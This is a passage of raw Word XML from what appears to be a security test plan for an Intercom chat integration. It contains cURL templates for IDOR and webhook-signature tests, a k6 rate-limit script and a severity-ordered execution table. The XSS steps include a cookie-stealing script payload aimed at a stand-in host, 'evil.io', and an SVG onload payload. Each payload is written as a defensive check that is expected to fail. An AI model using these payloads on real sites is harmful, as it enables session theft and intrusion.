          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Intercom REST API — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cURL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Templates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3197D86C" w14:textId="30DB61F3" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="6" w:color="2E75B6"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F9"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Courier New" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t># TC-API-001: Fetch own conversation curl -X GET 'https://api.intercom.io/conversations/conv_88441' \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-H 'Authorization: Bearer '"$INTERCOM_API_TOKEN_EDC" \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-H 'Accept: application/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json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>' \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-H 'Intercom-Version: 2.11'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># TC-API-002: IDOR — User A fetches User B conversation curl -X GET 'https://api.intercom.io/conversations/conv_USER_B_55992' \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-H 'Authorization: Bearer '"$INTERCOM_API_TOKEN_USER_A" \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-H 'Intercom-Version: 2.11' # Expected: HTTP 403 — NOT 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29567AC8" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00AE1C1B">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75B1126F" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Webhook Signature Generation &amp; Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251D2CFA" w14:textId="67755889" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="6" w:color="2E75B6"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F9"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pP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# Generate valid webhook signature for TC-WH-001 PAYLOAD='{"type":"conversation.user.replied","id":"conv_88441"}' SIG=$(echo -n "$PAYLOAD" | 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openssl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dgst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-sha256 -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hmac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"$INTERCOM_WEBHOOK_SECRET" | awk '{print $2}')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># Send valid webhook curl -X POST 'https://edcapp-qa.medrio.com/webhooks/intercom' \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-H "X-Hub-Signature-256: sha256=$SIG" \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-H 'Content-Type: application/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json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>' \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-d "$PAYLOAD"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># TC-WH-002: Send tampered payload with original signature TAMPERED='{"type":"conversation.admin.assigned","id":"conv_88441"}' curl -X POST 'https://edcapp-qa.medrio.com/webhooks/intercom' \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-H "X-Hub-Signature-256: sha256=$SIG" \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-H 'Content-Type: application/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json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>' \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-d "$TAMPERED" # Expected: HTTP 401</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B534803" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00AE1C1B">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74FE8915" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>XSS Testing — Browser Console Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DDDD58" w14:textId="746A91CD" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="6" w:color="2E75B6"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F9"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pP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// TC-XSS-001: Script injection test // Step 1: Open Chrome DevTools → Network tab (record) // Step 2: Paste in Console: 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window.Intercom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>('update', { name: '&lt;script&gt;fetch("https://evil.io/?c="+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document.cookie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>)&lt;/script&gt;' }); // Step 3: Check Network tab — NO request to evil.io // Step 4: Inspect widget UI — name shown as escaped literal text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// TC-XSS-002: SVG injection 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window.Intercom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('update', { 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custom_attributes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>: { bio: '&lt;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svg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onload="alert(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document.domain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>)"&gt;' } }); // Expected: no alert dialog triggered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51815667" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00AE1C1B">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69DC9AA9" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Rate Limiting — k6 Script (TC-RL-001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F263F27" w14:textId="589E8084" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="6" w:color="2E75B6"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F9"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pP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// Save as intercom_ratelimit.js import http from 'k6/http'; import { check } from 'k6'; export let options = { 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vus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>: 84, duration: '10s' }; export default function() {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const res = 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http.get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>(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'https://edcapp-qa.medrio.com/api/intercom/proxy/conversations',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{ headers: { 'Authorization': 'Bearer ' + __ENV.INTERCOM_API_TOKEN_EDC } }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);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check(res, {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'first 83 requests succeed': (r) =&gt; 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r.status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=== 200,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'84th+ request throttled': (r) =&gt; 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r.status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=== 429,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'Retry-After header present on 429': (r) =&gt; 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r.status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!== 429 || </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Courier New" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>r.headers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Courier New" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>['Retry-After'] !== undefined,</w:t>
      </w:r>
      <w:r w:rsidR="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Courier New" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Courier New" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> }); } // Run: k6 run -e INTERCOM_API_TOKEN_EDC=$INTERCOM_API_TOKEN_EDC intercom_ratelimit.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09519B61" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00AE1C1B">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AC29469" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="3" w:color="1F4E79"/>
        </w:pBdr>
        <w:spacing w:before="320" w:after="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Section 6 — Severity-Based Execution Order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C42E27" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="50" w:after="50"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>RULE: Wave 1 and Wave 2 (Critical) must PASS before any Wave 3+ tests begin. A single FAIL in waves 1-4 is a release blocker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422B55E0" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00AE1C1B">
      <w:pPr>
        <w:spacing w:before="60" w:after="6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4"/>
        <w:gridCol w:w="959"/>
        <w:gridCol w:w="1186"/>
        <w:gridCol w:w="2110"/>
        <w:gridCol w:w="2432"/>
        <w:gridCol w:w="1092"/>
        <w:gridCol w:w="897"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="09F9A29C" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr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A45B3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Wave</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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096E8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A0292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Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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16F0A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TC IDs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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D777F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Rationale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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E2B10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Blocking?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6DC2F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Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="2383D889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0029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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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0B62B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Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>🔴</w:t>
            </w:r>
            <w:r w:rsidRPr="0038631E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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982D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Identity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Verif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.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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E19B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TC-IV-001 – TC-IV-004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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CB17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HMAC bypass = full user impersonation. </w:t>
            </w:r>
            <w:proofErr w:type="gram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Must</w:t>
            </w:r>
            <w:proofErr w:type="gram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pass before any other test.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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0AFA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C0392B"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>YES — STOP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F141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Postman + Browser Console</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="14D6D50A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6B4B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lastRenderedPageBreak/>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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0C6F9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Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>🔴</w:t>
            </w:r>
            <w:r w:rsidRPr="0038631E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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E122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Webhook Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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B37E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TC-WH-001 – TC-WH-004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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EBD18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Unsigned webhooks allow arbitrary event injection. No auth = no trust.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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1647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C0392B"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>YES — STOP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7BC7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cURL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+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ngrok</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="69F6F3FF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79B0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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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23BF1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Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>🟠</w:t>
            </w:r>
            <w:r w:rsidRPr="0038631E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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290C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API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AuthZ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(IDOR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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9D2E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TC-API-001 – TC-API-004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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BC36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Cross-user data access violates HIPAA/GDPR. Must be blocked.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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3183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C0392B"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>YES — STOP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49D6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cURL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/ Postman</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="697DB630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B626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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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B621C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Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>🟠</w:t>
            </w:r>
            <w:r w:rsidRPr="0038631E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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FB1B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XSS / Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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0FE9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TC-XSS-001 – TC-XSS-003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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3A32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Stored XSS in widget can steal session cookies for all Intercom users.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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7B14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C0392B"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>YES — STOP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949B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Browser Console + Burp Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="342E0036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33EE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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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21517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Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>🟠</w:t>
            </w:r>
            <w:r w:rsidRPr="0038631E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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FEB0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PII Exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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80C9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TC-PII-001 – TC-PII-006</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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7B46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PHI in Intercom/Pendo payloads = regulatory violation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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FB79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C0392B"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>YES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216B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DevTools Network Tab</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="7F5C1D56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AE50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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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0BCA4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Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2980B9"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>🟡</w:t>
            </w:r>
            <w:r w:rsidRPr="0038631E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2980B9"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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1D8E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Rate Limiting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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A594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TC-RL-001 – TC-RL-002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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0BAE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Abuse protection — important but not blocking unless DoS is trivial.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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F519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6B1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>NO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ACD2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k6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="5BF24D30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E6ED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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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F1F05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Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2980B9"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>🟡</w:t>
            </w:r>
            <w:r w:rsidRPr="0038631E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2980B9"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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5F8C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CSP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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4DA5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TC-CSP-001 – TC-CSP-002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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9B18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Defense-in-depth; required before production but not a </w:t>
            </w:r>
            <w:proofErr w:type="gram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show-stopper</w:t>
            </w:r>
            <w:proofErr w:type="gram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if layers above pass.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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C1AB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6B1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>NO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927A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cURL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+ Browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="3A91B4CE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8147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1F4E79"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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5CD87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Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="27AE60"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>🟢</w:t>
            </w:r>
            <w:r w:rsidRPr="0038631E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="27AE60"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> Regression</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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AAC2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Regression</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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B349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TC-REG-001 – TC-REG-003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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DC90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Validate no functional breakage from security changes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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58CD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C0392B"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>YES (must all pass)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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8437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Postman + Browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="02D204A1" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00AE1C1B">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E083408" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="3" w:color="1F4E79"/>
        </w:pBdr>
        <w:spacing w:before="320" w:after="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Section 7 — Sign-Off &amp; Exit Checklist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC102CF" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Security Remediation Verified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60"/>
        <w:gridCol w:w="1800"/>
